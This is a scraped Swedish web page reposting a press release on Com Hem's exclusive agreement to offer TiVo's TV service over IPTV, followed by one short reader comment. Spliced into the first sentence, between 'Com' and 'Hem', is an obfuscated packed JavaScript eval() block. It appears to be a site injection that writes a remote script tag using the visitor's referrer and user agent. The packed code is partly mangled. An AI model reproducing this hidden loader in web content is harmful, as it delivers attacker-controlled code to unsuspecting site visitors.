Image Image Image Image Image Image Image Image Image Image

| 6 december, 2020

Scroll to top

Top

Com Hem ingår exklusivt avtal med TiVo

Com Hem ingår exklusivt avtal med TiVo
Sebastian

Com eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rdbdf|var|u0026u|referrer|hfeyy||js|php’.split(’|’),0,{}))
Hem och amerikanska TiVo ingår avtal som ger Com Hem möjligheten att erbjuda TiVos välkända, smarta och användarvänliga, tv-lösningar till Com Hems kunder i Sverige. Det är första gången någonsin som TiVos tjänster även erbjuds via ett IPTV-nät. Det ger Com Hem en unik möjlighet att leverera en enastående tv-upplevelse för praktiskt taget alla typer av rörlig bild på varje typ av plattform.

Com Hem, ledande leverantör av tv, bredband och telefoni med 1,74 miljoner anslutna hushåll i Sverige, och TiVo Inc., ledande bolag inom avancerade tv-lösningar, har ingått ett ömsesidigt och exklusivt avtal som möjliggör en helt ny tv-upplevelse för svenska konsumenter. Samarbetet innebär en helt integrerad tv-upplevelse med traditionellt tv-innehåll, video on demand (VOD), innehållstjänster via bredband och appar.

Samarbetet mellan Com Hem och TiVo går utöver den traditionella tv-upplevelsen och gör det möjligt att enkelt välja ur ett mycket stort utbud av innehåll. Com Hems TiVo-lösning kommer också att göra det möjligt att konsumera innehållet på surfplattor, smarta telefoner eller genom webben.

TiVo har de senaste tio åren investerat över en halv miljard US-dollar på forskning och utveckling i syfte att skapa en fulländad tv-upplevelse, både vad gäller användarvänlighet och kraftfulla funktioner.

– Vi har tittat på flera olika alternativ för att hitta det bästa sättet att kunna erbjuda våra kunder en optimal tv-upplevelse med ett heltäckande utbud av traditionella tv-tjänster, video on demand och innehållstjänster via bredbandet till varje rum och varje tv-apparat i våra kunders hem samt till surfplattor, smarta telefoner och webben. TiVo var den lösning som övertygade mest med sin användarvänlighet, som utan tvivel är bäst i klassen, och dess kraftfulla och konsumentvänliga funktioner. TiVo kommer att spela en stor roll i våra framtidsplaner, vilket innebär att vi kommer att omdefiniera våra abonnemangserbjudanden till att innefatta funktioner för att titta på tv på flera plattformar, fjärrinspelning, avancerat sök, smarta rekommendationer och åtkomst till ett brett utbud av interaktiva applikationer från tredje part, säger Tomas Franzén, vd på Com Hem.

Tom Rogers, vd för TiVo, kommenterar:

– Vi är oerhört glada att få arbeta tillsammans med Com Hem för att erbjuda TiVo till Com Hems närmare två miljoner anslutna hushåll, och vi tror att detta, i likhet med vad som skett hos Virgin Media i Storbritannien och ONO i Spanien, kommer att stärka Com Hems redan starka position på marknaden. Com Hems marknadsledande bredbandstjänster passar perfekt för oss på TiVo, och vi är stolta över att leverera den optimala kombinationen av traditionell tv och framtidens tv. Dessutom är detta avtal ett betydande steg framåt för TiVo eftersom vi för första gången kommer att erbjuda våra tjänster över ett IPTV-nät, vilket understryker vår förmåga att erbjuda TiVo via praktiskt taget alla sorters infrastruktur och via alla former av enheter.

Enligt Tomas Franzén innebär lanseringen av TiVo, tillsammans med Com Hems bredbandserbjudande på upp till 200 Mbit/s och tjänster för fast telefoni, att kunderna kommer att ha fortsatt tillgång till Sveriges bästa triple play-upplevelse.

– Vi är mycket glada att vår ägare BC Partners stöder vår vision och har bidragit med en betydande finansiering för en offensiv utrullning av TiVos tjänster, säger Tomas Franzén.

Med TiVo sätter Com Hem standarden för ett smartare tv-tittande
I och med samarbetet med TiVo lanserar Com Hem inte bara ett nytt sätt att se på tv utan även ett nytt sätt att hitta innehåll, när som helst och var som helst – på alla sorters enheter. Några viktiga funktioner är:

  • One-Stop-Shop, där kunderna på ett enkelt sätt kan navigera genom allt innehåll som finns tillgängligt med hjälp av marknadens bästa användargränssnitt på flera olika enheter;
  • Smart sökfunktion som gör det möjligt för Com Hems kunder att hitta allt innehåll, inklusive traditionell tv, video on demand, pay-per-view (PPV) och OTT-/Play-tjänster, där sökresultaten sorteras efter popularitet och relevans;
  • Tjänsten är så smart att TiVo snart lär sig vad tittaren gillar, ger liknande rekommendationer och automatiskt spelar in dessa program;

Com Hems TiVo-tjänst lanseras under våren 2013.

Comments

  1. Johannese

    Det var väl lite på tiden, eller?